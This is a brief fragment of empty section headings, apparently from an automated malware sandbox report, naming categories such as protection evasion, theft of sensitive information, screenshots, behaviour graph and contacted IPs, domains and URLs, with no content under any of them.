HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs